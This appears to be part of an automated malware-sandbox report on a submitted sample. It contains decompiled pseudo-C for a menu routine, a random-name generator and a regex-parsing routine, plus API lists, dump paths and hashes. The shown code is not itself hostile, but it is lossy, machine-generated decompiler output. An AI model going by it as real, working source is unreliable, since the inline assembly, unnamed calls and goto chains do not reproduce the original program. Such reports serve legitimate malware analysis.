                                                    				SendMessageA( *(_t41 + 0x20), 0x80, 1,  *(_t41 + 0x80));
                                                    				SendMessageA( *(_t41 + 0x20), 0x80, 0,  *(_t41 + 0x80));
                                                    				_t22 = 1;
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
                                                    				return _t22;
                                                    			}









                                                    APIs
                                                    • _EH_prolog.MSVCRT ref: 004019A3
                                                    • GetSystemMenu.USER32(?,00000000), ref: 004019B9
                                                    • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 004019F8
                                                    • AppendMenuA.USER32(?,00000000,00000010,?), ref: 00401A04
                                                    • SendMessageA.USER32(?,00000080,00000001,?), ref: 00401A2E
                                                    • SendMessageA.USER32(?,00000080,00000000,?), ref: 00401A3C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: Menu$AppendMessageSend$H_prologSystem
                                                    • String ID:
                                                    • API String ID: 2469542211-0
                                                    • Opcode ID: b776af5b621d7cd78022760181e20f7924a719f0e5e1bcefeefb39d5102cff14
                                                    • Instruction ID: 5be617b225bb215d29ef40c61bba07445f241ab3afedab8fc5c110dbd8f57498
                                                    • Opcode Fuzzy Hash: b776af5b621d7cd78022760181e20f7924a719f0e5e1bcefeefb39d5102cff14
                                                    • Instruction Fuzzy Hash: FD11B232640604EBDB21ABA1CC81FDEBB71FF84B00F10452AF555660E1DBB56840DF18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E0040107C(intOrPtr _a4, signed int _a8) {
                                                    				void _v32;
                                                    				signed int _t19;
                                                    				signed int _t22;
                                                    				signed int _t25;
                                                    				signed int _t26;
                                                    				signed int _t29;
                                                    				signed int _t30;
                                                    				void* _t39;
                                                    				void* _t40;
                                                    
                                                    				_t26 = 6;
                                                    				memcpy( &_v32, "ekimhuqcroanflvzgdjtxypswb", _t26 << 2);
                                                    				asm("movsw");
                                                    				asm("movsb");
                                                    				srand(GetTickCount());
                                                    				_t19 = rand();
                                                    				asm("cdq");
                                                    				_t29 = 0xa;
                                                    				_t25 = _t19 % _t29;
                                                    				if(_t25 < _a8) {
                                                    					_t25 = _a8;
                                                    				}
                                                    				_t39 = 0;
                                                    				if(_t25 > 0) {
                                                    					do {
                                                    						_t22 = rand();
                                                    						asm("cdq");
                                                    						_t30 = 0x1a;
                                                    						 *((char*)(_t39 + _a4)) =  *((intOrPtr*)(_t40 + _t22 % _t30 - 0x1c));
                                                    						_t39 = _t39 + 1;
                                                    					} while (_t39 < _t25);
                                                    				}
                                                    				return _t25;
                                                    			}













                                                    APIs
                                                    Strings
                                                    • ekimhuqcroanflvzgdjtxypswb, xrefs: 00401088
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: rand$CountTicksrand
                                                    • String ID: ekimhuqcroanflvzgdjtxypswb
                                                    • API String ID: 3923125369-3762667353
                                                    • Opcode ID: b82129336e1194dd03dfb6d02705f8909e6a668a9130fe837ce4919de25d8751
                                                    • Instruction ID: 6e7471b6b191c25231bb1943ac2c278cbb6d4f2c92849cbbbbe3a5302c238a81
                                                    • Opcode Fuzzy Hash: b82129336e1194dd03dfb6d02705f8909e6a668a9130fe837ce4919de25d8751
                                                    • Instruction Fuzzy Hash: 93F04C337043449BC720BF5A6CC4D9BBFA99B89720F01807AFD4067381C5B5944386B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 46%
                                                    			E00405730(intOrPtr* __ebx, signed int* __edi, char* __esi) {
                                                    				intOrPtr* _t197;
                                                    				intOrPtr _t202;
                                                    				intOrPtr _t211;
                                                    				intOrPtr _t212;
                                                    				intOrPtr _t217;
                                                    				intOrPtr _t223;
                                                    				intOrPtr _t228;
                                                    				intOrPtr _t233;
                                                    				intOrPtr _t238;
                                                    				intOrPtr _t243;
                                                    				signed char _t250;
                                                    				intOrPtr _t252;
                                                    				intOrPtr* _t268;
                                                    				intOrPtr _t270;
                                                    				intOrPtr _t273;
                                                    				void* _t274;
                                                    				intOrPtr _t278;
                                                    				void* _t286;
                                                    				intOrPtr* _t291;
                                                    				intOrPtr _t293;
                                                    				intOrPtr _t297;
                                                    				intOrPtr* _t302;
                                                    				intOrPtr _t306;
                                                    				signed int _t309;
                                                    				void* _t312;
                                                    				intOrPtr _t317;
                                                    				signed int _t319;
                                                    				signed int _t322;
                                                    				void* _t325;
                                                    				signed int _t326;
                                                    				signed int _t329;
                                                    				signed int _t332;
                                                    				signed int _t335;
                                                    				signed int _t338;
                                                    				intOrPtr* _t343;
                                                    				signed int _t345;
                                                    				signed int _t354;
                                                    				signed int _t360;
                                                    				signed int _t368;
                                                    				intOrPtr _t371;
                                                    				signed int _t372;
                                                    				signed int* _t399;
                                                    				char* _t401;
                                                    				void* _t403;
                                                    
                                                    				_t401 = __esi;
                                                    				_t399 = __edi;
                                                    				_t302 = __ebx;
                                                    				 *(_t403 + 8) = __esi[0x27];
                                                    				 *0x41720c();
                                                    				asm("sbb edx, edx");
                                                    				_t197 =  *__ebx;
                                                    				if(( ~( *( *(_t403 + 8) + 4)) &  *((intOrPtr*)( *(_t403 + 8) + 8)) +  *( *(_t403 + 8) + 4)) != _t197) {
                                                    					_t306 =  *_t197;
                                                    					if(_t306 < 0x30 || _t306 > 0x39) {
                                                    						if(_t306 != 0x65) {
                                                    							if(_t306 != 0x78) {
                                                    								if(_t306 != 0x63) {
                                                    									if(_t306 != 0x61 ||  *(_t403 + 0x13) == 0) {
                                                    										if(_t306 != 0x66 ||  *(_t403 + 0x13) == 0) {
                                                    											if(_t306 != 0x6e ||  *(_t403 + 0x13) == 0) {
                                                    												if(_t306 != 0x72 ||  *(_t403 + 0x13) == 0) {
                                                    													if(_t306 != 0x74 ||  *(_t403 + 0x13) == 0) {
                                                    														if(_t306 != 0x5c ||  *(_t403 + 0x13) == 0) {
                                                    															_push(_t399);
                                                    															_push(_t306);
                                                    															if(E00409CBB() == 0) {
                                                    																_t309 =  &(_t401[4]);
                                                    																_t202 = E00409BC5(_t401,  *((intOrPtr*)( *_t302)),  *_t399, _t309);
                                                    																 *((intOrPtr*)(_t403 - 0x10)) = _t202;
                                                    																 *((char*)(_t403 - 0x14)) = _t309 & 0xffffff00 | _t202 != 0x00000000;
                                                    																E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    																_t312 = _t403 - 0x14;
                                                    															} else {
                                                    																_t319 =  *_t399;
                                                    																_t212 = E00409B0F(_t198, _t319,  &(_t401[4]));
                                                    																 *((intOrPtr*)(_t403 - 0x10)) = _t212;
                                                    																 *((char*)(_t403 - 0x14)) = _t319 & 0xffffff00 | _t212 != 0x00000000;
                                                    																E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    																_t312 = _t403 - 0x14;
                                                    															}
                                                    															goto L6;
                                                    														} else {
                                                    															_t322 =  &(_t401[4]);
                                                    															 *_t302 = _t197 + 1;
                                                    															_t217 = E00409BC5(_t401, 0x5c,  *_t399, _t322);
                                                    															 *((intOrPtr*)(_t403 - 0x10)) = _t217;
                                                    															 *((char*)(_t403 - 0x14)) = _t322 & 0xffffff00 | _t217 != 0x00000000;
                                                    															E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    															_t325 = _t403 - 0x14;
                                                    															goto L57;
                                                    														}
                                                    													} else {
                                                    														_t326 =  &(_t401[4]);
                                                    														 *_t302 = _t197 + 1;
                                                    														_t223 = E00409BC5(_t401, 9,  *_t399, _t326);
                                                    														 *((intOrPtr*)(_t403 - 0x10)) = _t223;
                                                    														 *((char*)(_t403 - 0x14)) = _t326 & 0xffffff00 | _t223 != 0x00000000;
                                                    														E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    														_t325 = _t403 - 0x14;
                                                    														goto L57;
                                                    													}
                                                    												} else {
                                                    													_t329 =  &(_t401[4]);
                                                    													 *_t302 = _t197 + 1;
                                                    													_t228 = E00409BC5(_t401, 0xd,  *_t399, _t329);
                                                    													 *((intOrPtr*)(_t403 - 0x10)) = _t228;
                                                    													 *((char*)(_t403 - 0x14)) = _t329 & 0xffffff00 | _t228 != 0x00000000;
                                                    													E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    													_t325 = _t403 - 0x14;
                                                    													goto L57;
                                                    												}
                                                    											} else {
                                                    												_t332 =  &(_t401[4]);
                                                    												 *_t302 = _t197 + 1;
                                                    												_t233 = E00409BC5(_t401, 0xa,  *_t399, _t332);
                                                    												 *((intOrPtr*)(_t403 - 0x10)) = _t233;
                                                    												 *((char*)(_t403 - 0x14)) = _t332 & 0xffffff00 | _t233 != 0x00000000;
                                                    												E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    												_t325 = _t403 - 0x14;
                                                    												goto L57;
                                                    											}
                                                    										} else {
                                                    											_t335 =  &(_t401[4]);
                                                    											 *_t302 = _t197 + 1;
                                                    											_t238 = E00409BC5(_t401, 0xc,  *_t399, _t335);
                                                    											 *((intOrPtr*)(_t403 - 0x10)) = _t238;
                                                    											 *((char*)(_t403 - 0x14)) = _t335 & 0xffffff00 | _t238 != 0x00000000;
                                                    											E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    											_t325 = _t403 - 0x14;
                                                    											goto L57;
                                                    										}
                                                    									} else {
                                                    										_t338 =  &(_t401[4]);
                                                    										 *_t302 = _t197 + 1;
                                                    										_t243 = E00409BC5(_t401, 7,  *_t399, _t338);
                                                    										 *((intOrPtr*)(_t403 - 0x10)) = _t243;
                                                    										 *((char*)(_t403 - 0x14)) = _t338 & 0xffffff00 | _t243 != 0x00000000;
                                                    										E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    										_t325 = _t403 - 0x14;
                                                    										goto L57;
                                                    									}
                                                    								}
                                                    								 *(_t403 + 0x10) = _t401[0x27];
                                                    								 *0x41720c();
                                                    								 *_t302 =  *_t302 + 1;
                                                    								_t343 =  *_t302;
                                                    								asm("sbb edx, edx");
                                                    								if(( ~( *( *(_t403 + 0x10) + 4)) &  *((intOrPtr*)( *(_t403 + 0x10) + 8)) +  *( *(_t403 + 0x10) + 4)) == _t343) {
                                                    									 *((char*)(_t403 - 0x54)) =  *((intOrPtr*)(_t403 + 0xf));
                                                    									 *0x417230(0);
                                                    									_t401 = "incomplete escape sequence \\c";
                                                    									 *0x417234(_t401, strlen(_t401));
                                                    									_t343 = _t403 - 0xb8;
                                                    									 *(_t403 - 4) = 6;
                                                    									E00404FA7(_t343, _t403 - 0x54);
                                                    									_push(0x4196f8);
                                                    									_push(_t403 - 0xb8);
                                                    									 *((intOrPtr*)(_t403 - 0xb8)) = 0x417698;
                                                    									L004153FE();
                                                    								}
                                                    								_t250 =  *_t343;
                                                    								 *_t302 = _t343 + 1;
                                                    								if(_t250 >= 0x61 && _t250 <= 0x7a) {
                                                    									_t250 =  *0x4172a4(_t250);
                                                    								}
                                                    								_t345 =  *_t399;
                                                    								_t252 = E00409BC5(_t401, _t250 ^ 0x00000040, _t345,  &(_t401[4]));
                                                    								 *((intOrPtr*)(_t403 - 0x10)) = _t252;
                                                    								 *((char*)(_t403 - 0x14)) = _t345 & 0xffffff00 | _t252 != 0x00000000;
                                                    								E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    								_t325 = _t403 - 0x14;
                                                    								goto L57;
                                                    							}
                                                    							 *(_t403 + 8) =  *(_t403 + 8) & 0x00000000;
                                                    							 *(_t403 + 0x13) =  *(_t403 + 0x13) & 0x00000000;
                                                    							 *_t302 = _t197 + 1;
                                                    							while(1) {
                                                    								 *(_t403 + 0x14) = _t401[0x27];
                                                    								 *0x41720c();
                                                    								asm("sbb edx, edx");
                                                    								_t268 =  *_t302;
                                                    								if(( ~( *( *(_t403 + 0x14) + 4)) &  *((intOrPtr*)( *(_t403 + 0x14) + 8)) +  *( *(_t403 + 0x14) + 4)) == _t268) {
                                                    									break;
                                                    								}
                                                    								_t273 =  *_t268;
                                                    								if(_t273 < 0x30 || _t273 > 0x39) {
                                                    									if(_t273 < 0x61 || _t273 > 0x66) {
                                                    										if(_t273 < 0x41 || _t273 > 0x46) {
                                                    											break;
                                                    										} else {
                                                    											goto L30;
                                                    										}
                                                    									} else {
                                                    										goto L30;
                                                    									}
                                                    								} else {
                                                    									L30:
                                                    									_t274 = E00402FBD(_t273);
                                                    									 *(_t403 + 0x13) =  *(_t403 + 0x13) + 1;
                                                    									 *_t302 =  *_t302 + 1;
                                                    									 *(_t403 + 8) = _t274 + ( *(_t403 + 8) << 4);
                                                    									if( *(_t403 + 0x13) < 2) {
                                                    										continue;
                                                    									}
                                                    									break;
                                                    								}
                                                    							}
                                                    							_t354 =  &(_t401[4]);
                                                    							_t270 = E00409BC5(_t401,  *(_t403 + 8),  *_t399, _t354);
                                                    							 *((intOrPtr*)(_t403 - 0x10)) = _t270;
                                                    							 *((char*)(_t403 - 0x14)) = _t354 & 0xffffff00 | _t270 != 0x00000000;
                                                    							E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    							_t325 = _t403 - 0x14;
                                                    							goto L57;
                                                    						}
                                                    						_t360 =  &(_t401[4]);
                                                    						 *_t302 = _t197 + 1;
                                                    						_t278 = E00409BC5(_t401, 0x1b,  *_t399, _t360);
                                                    						 *((intOrPtr*)(_t403 - 0x10)) = _t278;
                                                    						 *((char*)(_t403 - 0x14)) = _t360 & 0xffffff00 | _t278 != 0x00000000;
                                                    						E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    						_t325 = _t403 - 0x14;
                                                    						goto L57;
                                                    					} else {
                                                    						 *((intOrPtr*)(_t403 - 0x28)) = _t197;
                                                    						 *(_t403 + 0x10) = __esi[0x27];
                                                    						 *0x41720c();
                                                    						asm("sbb edx, edx");
                                                    						_t286 = E004090FF(_t403 - 0x28,  ~( *( *(_t403 + 0x10) + 4)) &  *((intOrPtr*)( *(_t403 + 0x10) + 8)) +  *( *(_t403 + 0x10) + 4), 0x3e7);
                                                    						if( *((char*)( *__ebx)) == 0x30 || _t286 >= 0xa && _t286 >= __esi[0xb]) {
                                                    							 *(_t403 + 8) =  *(_t403 + 8) & 0x00000000;
                                                    							 *(_t403 + 0x13) =  *(_t403 + 0x13) & 0x00000000;
                                                    							while(1) {
                                                    								 *(_t403 + 0x14) = _t401[0x27];
                                                    								 *0x41720c();
                                                    								asm("sbb edx, edx");
                                                    								_t291 =  *_t302;
                                                    								if(( ~( *( *(_t403 + 0x14) + 4)) &  *((intOrPtr*)( *(_t403 + 0x14) + 8)) +  *( *(_t403 + 0x14) + 4)) == _t291) {
                                                    									break;
                                                    								}
                                                    								_t371 =  *_t291;
                                                    								if(_t371 >= 0x30 && _t371 <= 0x37) {
                                                    									 *(_t403 + 0x13) =  *(_t403 + 0x13) + 1;
                                                    									 *(_t403 + 8) = ( *(_t403 + 8) - 6 << 3) + _t371;
                                                    									 *_t302 = _t291 + 1;
                                                    									if( *(_t403 + 0x13) < 3) {
                                                    										continue;
                                                    									}
                                                    								}
                                                    								break;
                                                    							}
                                                    							_t368 =  &(_t401[4]);
                                                    							_t293 = E00409BC5(_t401,  *(_t403 + 8),  *_t399, _t368);
                                                    							 *((intOrPtr*)(_t403 - 0x10)) = _t293;
                                                    							 *((char*)(_t403 - 0x14)) = _t368 & 0xffffff00 | _t293 != 0x00000000;
                                                    							E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    							_t325 = _t403 - 0x14;
                                                    							L57:
                                                    							E00406ED3(_t325);
                                                    						} else {
                                                    							_t372 =  *_t399;
                                                    							_t297 = E00409C62(_t286, _t372,  &(_t401[4]));
                                                    							 *((intOrPtr*)(_t403 - 0x10)) = _t297;
                                                    							 *((char*)(_t403 - 0x14)) = _t372 & 0xffffff00 | _t297 != 0x00000000;
                                                    							E0040BF91(_t403 - 0x24, _t403 - 0x14);
                                                    							E00406ED3(_t403 - 0x14);
                                                    							 *_t302 =  *((intOrPtr*)(_t403 - 0x28));
                                                    						}
                                                    						goto L1;
                                                    					}
                                                    				} else {
                                                    					__ecx =  *__edi;
                                                    					 *__ebx = __eax;
                                                    					__eax = E00409BC5(__esi, __eax,  *__edi, __esi + 4);
                                                    					 *((intOrPtr*)(__ebp - 0x10)) = __eax;
                                                    					__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
                                                    					__eax = __ebp - 0x14;
                                                    					 *(__ebp - 0x14) = __cl;
                                                    					__ecx = __ebp - 0x24;
                                                    					__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
                                                    					__ecx = __ebp - 0x14;
                                                    					L6:
                                                    					E00406ED3(_t312);
                                                    					 *_t302 =  *_t302 + 1;
                                                    				}
                                                    				L1:
                                                    				if( *((intOrPtr*)(_t403 - 0x20)) != 0) {
                                                    					_push(_t399);
                                                    					_push( *((intOrPtr*)(_t403 - 0x34)));
                                                    					_push(_t302);
                                                    					_push(_t403 - 0x24);
                                                    					E00408D03(_t401);
                                                    					_t211 =  *((intOrPtr*)(_t403 + 0xc));
                                                    					_t317 =  *((intOrPtr*)(_t403 - 0x20));
                                                    					 *(_t403 - 0x24) =  *(_t403 - 0x24) & 0x00000000;
                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x1c)))) = _t317;
                                                    					 *((intOrPtr*)(_t211 + 0x1c)) = _t317 + 4;
                                                    				}
                                                    				 *(_t403 - 4) =  *(_t403 - 4) & 0x00000000;
                                                    				E0040C5ED(_t403 - 0x30);
                                                    				 *(_t403 - 4) =  *(_t403 - 4) | 0xffffffff;
                                                    				E00406ED3(_t403 - 0x24);
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t403 - 0xc));
                                                    				return 1;
                                                    			}
















































                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: tolowertoupper
                                                    • String ID: incomplete escape sequence \c
                                                    • API String ID: 1080271956-949001438
                                                    • Opcode ID: 39bb49a1a08b3dd777d864a793be88eea520dc48117c4783dab6732a6018448f
                                                    • Instruction ID: 44cb3acf87c3d58dae45ce2b98c07f36b87c2adb796d601b5b08f860e8cdf80f
                                                    • Opcode Fuzzy Hash: 39bb49a1a08b3dd777d864a793be88eea520dc48117c4783dab6732a6018448f
                                                    • Instruction Fuzzy Hash: 1202A0B190064A9FDB15CF64C991AEF77B4EF44304F14406AE852B7281EB78AF14CF66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 33%
                                                    			E00408D03(char* __ecx) {
                                                    				signed int _t104;
                                                    				intOrPtr _t112;
                                                    				void* _t117;
                                                    				void* _t118;
                                                    				void* _t119;
                                                    				void* _t120;
                                                    				signed int _t124;
                                                    				void* _t130;
                                                    				signed int _t134;
                                                    				void* _t140;
                                                    				void* _t148;
                                                    				void* _t149;
                                                    				signed char* _t151;
                                                    				signed int _t164;
                                                    				signed int _t203;
                                                    				void* _t215;
                                                    				intOrPtr _t216;
                                                    				signed char** _t217;
                                                    				char _t221;
                                                    				char _t224;
                                                    				void* _t226;
                                                    				char* _t227;
                                                    				void* _t230;
                                                    
                                                    				L004153D0();
                                                    				_t227 = __ecx;
                                                    				_t216 =  *((intOrPtr*)(__ecx + 0x27));
                                                    				 *0x41720c(_t215, _t226, _t149);
                                                    				_t104 =  *(_t216 + 4);
                                                    				_t217 =  *(_t230 + 0xc);
                                                    				asm("sbb ecx, ecx");
                                                    				if(( ~_t104 &  *((intOrPtr*)(_t216 + 8)) + _t104) !=  *_t217) {
                                                    					_t151 =  *(_t230 + 8);
                                                    					_t104 =  *((intOrPtr*)( *(_t151[4]) + 0x28))();
                                                    					if(_t104 == 0) {
                                                    						_t219 =  *((intOrPtr*)(__ecx + 0x27));
                                                    						 *(_t230 - 0xd) =  *(_t230 - 0xd) & 0x00000000;
                                                    						 *(_t230 - 0x1c) =  *(_t230 - 0x1c) | 0xffffffff;
                                                    						 *(_t230 - 0x14) =  *_t217;
                                                    						 *0x41720c();
                                                    						_t203 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x27)) + 8)) +  *(_t219 + 4);
                                                    						asm("sbb ecx, ecx");
                                                    						_t104 = E00406B76( *((intOrPtr*)(_t230 + 0x14)), _t230 - 0x14,  ~( *(_t219 + 4)) & _t203) - 9;
                                                    						if(_t104 == 0) {
                                                    							L28:
                                                    							 *(_t230 - 0x18) = 1;
                                                    							goto L30;
                                                    						} else {
                                                    							_t117 = _t104 - 1;
                                                    							if(_t117 == 0) {
                                                    								L26:
                                                    								 *(_t230 - 0x18) =  *(_t230 - 0x18) & 0x00000000;
                                                    								goto L31;
                                                    							} else {
                                                    								_t118 = _t117 - 1;
                                                    								if(_t118 == 0) {
                                                    									L24:
                                                    									 *(_t230 - 0x18) =  *(_t230 - 0x18) & 0x00000000;
                                                    									 *(_t230 - 0x1c) = 1;
                                                    									goto L31;
                                                    								} else {
                                                    									_t104 = _t118 - 1;
                                                    									if(_t104 == 0) {
                                                    										 *(_t230 - 0xd) = 1;
                                                    										goto L28;
                                                    									} else {
                                                    										_t119 = _t104 - 1;
                                                    										if(_t119 == 0) {
                                                    											 *(_t230 - 0xd) = 1;
                                                    											goto L26;
                                                    										} else {
                                                    											_t120 = _t119 - 1;
                                                    											if(_t120 == 0) {
                                                    												L23:
                                                    												 *(_t230 - 0xd) = 1;
                                                    												goto L24;
                                                    											} else {
                                                    												_t104 = _t120 - 1;
                                                    												if(_t104 == 0) {
                                                    													 *0x41720c();
                                                    													asm("sbb ecx, ecx");
                                                    													_t124 = E004090FF(_t230 - 0x14,  ~( *(_t227[0x27] + 4)) &  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t227[0x27] + 4), 0xffffffff);
                                                    													_t221 = _t227[0x27];
                                                    													 *(_t230 - 0x18) = _t124;
                                                    													 *0x41720c();
                                                    													_t104 =  *(_t221 + 4);
                                                    													asm("sbb ecx, ecx");
                                                    													if(( ~_t104 &  *((intOrPtr*)(_t221 + 8)) + _t104) !=  *(_t230 - 0x14)) {
                                                    														_t222 = _t227[0x27];
                                                    														 *0x41720c();
                                                    														_t203 =  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t222 + 4);
                                                    														asm("sbb ecx, ecx");
                                                    														_t130 = E00406B76( *((intOrPtr*)(_t230 + 0x14)), _t230 - 0x14,  ~( *(_t222 + 4)) & _t203) - 0x10;
                                                    														if(_t130 == 0) {
                                                    															_t151 =  *(_t230 - 0x14);
                                                    															 *0x41720c();
                                                    															asm("sbb ecx, ecx");
                                                    															_t134 = E004090FF(_t230 - 0x14,  ~( *(_t227[0x27] + 4)) &  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t227[0x27] + 4), 0xffffffff);
                                                    															if( *(_t230 - 0x14) != _t151) {
                                                    																 *(_t230 - 0x1c) = _t134;
                                                    															}
                                                    															_t224 = _t227[0x27];
                                                    															 *0x41720c();
                                                    															_t104 =  *(_t224 + 4);
                                                    															asm("sbb ecx, ecx");
                                                    															if( *(_t230 - 0x14) != ( ~_t104 &  *((intOrPtr*)(_t224 + 8)) + _t104)) {
                                                    																_t225 = _t227[0x27];
                                                    																 *0x41720c();
                                                    																_t203 =  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t225 + 4);
                                                    																asm("sbb ecx, ecx");
                                                    																_t140 = E00406B76( *((intOrPtr*)(_t230 + 0x14)), _t230 - 0x14,  ~( *(_t225 + 4)) & _t203) - 0x11;
                                                    																if(_t140 == 0) {
                                                    																	L21:
                                                    																	_t104 =  *(_t230 - 0x1c);
                                                    																	if(_t104 >=  *(_t230 - 0x18)) {
                                                    																		_t151 =  *(_t230 + 8);
                                                    																		goto L30;
                                                    																	} else {
                                                    																		 *((char*)(_t230 - 0x3c)) =  *((intOrPtr*)(_t230 + 0x13));
                                                    																		 *0x417230(0);
                                                    																		_t227 = "Can\'t do {n, m} with n > m";
                                                    																		 *0x417234(_t227, strlen(_t227));
                                                    																		 *(_t230 - 4) =  *(_t230 - 4) & 0x00000000;
                                                    																		 *0x417218(_t230 - 0x3c);
                                                    																		_push(0x4196f8);
                                                    																		_push(_t230 - 0x58);
                                                    																		 *((intOrPtr*)(_t230 - 0x58)) = 0x417698;
                                                    																		L004153FE();
                                                    																		goto L23;
                                                    																	}
                                                    																} else {
                                                    																	_t104 = _t140 - 1;
                                                    																	if(_t104 == 0) {
                                                    																		 *(_t230 - 0xd) = 1;
                                                    																		goto L21;
                                                    																	}
                                                    																}
                                                    															}
                                                    														} else {
                                                    															_t148 = _t130 - 1;
                                                    															if(_t148 == 0) {
                                                    																L14:
                                                    																_t104 =  *(_t230 - 0x18);
                                                    																 *(_t230 - 0x1c) = _t104;
                                                    																L30:
                                                    																if( *(_t230 - 0x18) != 0xffffffff) {
                                                    																	L31:
                                                    																	if( *((char*)(_t230 + 0x10)) != 0 &&  *(_t230 - 0x1c) > 0x10) {
                                                    																		_t227[0xa] = _t227[0xa] & 0x00000000;
                                                    																	}
                                                    																	_t164 = _t151[4];
                                                    																	_t112 =  *((intOrPtr*)( *_t164 + 0x1c))( *(_t230 - 0x18),  *(_t230 - 0x1c), _t203 & 0xffffff00 |  *(_t230 - 0xd) == 0x00000000,  &(_t227[4]));
                                                    																	 *((intOrPtr*)(_t230 - 0x28)) = _t112;
                                                    																	 *_t151 =  *_t151 & 0x00000000;
                                                    																	 *(_t230 - 0x2c) =  *(_t230 - 0x2c) & 0x00000000;
                                                    																	 *((intOrPtr*)(_t230 - 0x20)) = _t112;
                                                    																	 *((char*)(_t230 - 0x24)) = _t164 & 0xffffff00 | _t112 != 0x00000000;
                                                    																	 *(_t230 - 4) = 1;
                                                    																	E0040BF91(_t151, _t230 - 0x24);
                                                    																	E00406ED3(_t230 - 0x24);
                                                    																	 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
                                                    																	 *( *(_t230 + 0xc)) =  *(_t230 - 0x14);
                                                    																	_t104 = E00406ED3(_t230 - 0x2c);
                                                    																}
                                                    															} else {
                                                    																_t104 = _t148 - 1;
                                                    																if(_t104 == 0) {
                                                    																	 *(_t230 - 0xd) = 1;
                                                    																	goto L14;
                                                    																}
                                                    															}
                                                    														}
                                                    													}
                                                    												}
                                                    											}
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t230 - 0xc));
                                                    				return _t104;
                                                    			}


                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd
                                                    Similarity
                                                    • API ID: ExceptionH_prologThrowstrlen
                                                    • String ID: Can't do {n, m} with n > m
                                                    • API String ID: 1214428233-227225803
                                                    • Opcode ID: e553ee17eae5ca6cfc6cb64984d613825a92450ef0f053ca12d4eeb828b68aa6
                                                    • Instruction ID: 47e776d1a0f71e80584c51c7b8460619ed49745a926705c7366e66a548d0e101
                                                    • Opcode Fuzzy Hash: e553ee17eae5ca6cfc6cb64984d613825a92450ef0f053ca12d4eeb828b68aa6
                                                    • Instruction Fuzzy Hash: B3919271A0060A9BCF18CF64C554AEEB7B6FB44310F14826EE856A73C0DB78AD51CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • _EH_prolog.MSVCRT ref: 00405EEF
                                                    • strlen.MSVCRT ref: 00406065
                                                    • _CxxThrowException.MSVCRT(?,004196F8), ref: 00406096
                                                      • Part of subcall function 0040A5B8: _EH_prolog.MSVCRT ref: 0040A5BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
